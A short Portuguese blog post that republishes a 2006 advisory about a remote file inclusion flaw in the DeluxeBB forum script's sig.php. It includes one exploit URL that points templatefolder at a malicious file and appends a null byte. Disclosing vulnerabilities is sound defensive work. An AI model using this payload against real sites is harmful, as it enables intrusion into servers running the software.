segunda-feira, outubro 02, 2006

Deluxe BB - Inclusão de Arquivo Remoto

Falha: Uma má verificação na variável $templatefolder do arquivo Sig.php permite a inclusão de um arquivo arbitrário por usuário mal-intencionado.
Script: DeluxeBB
Download: deluxebb.com
Código vulnerável (functions.php):
indisponível
Desoberta por: r0ut3r
Exploit:
http://host/templates/deluxe/cp/sig.php?settings[smilies]=on&templat
efolder=arquivomaligno?%00
Papers relacionados: Inclusão de Arquivo Remoto.txt
Fonte: securityfocus.com
Postado por às

Nenhum comentário:

Postar um comentário

Assinar: Postar comentários (Atom)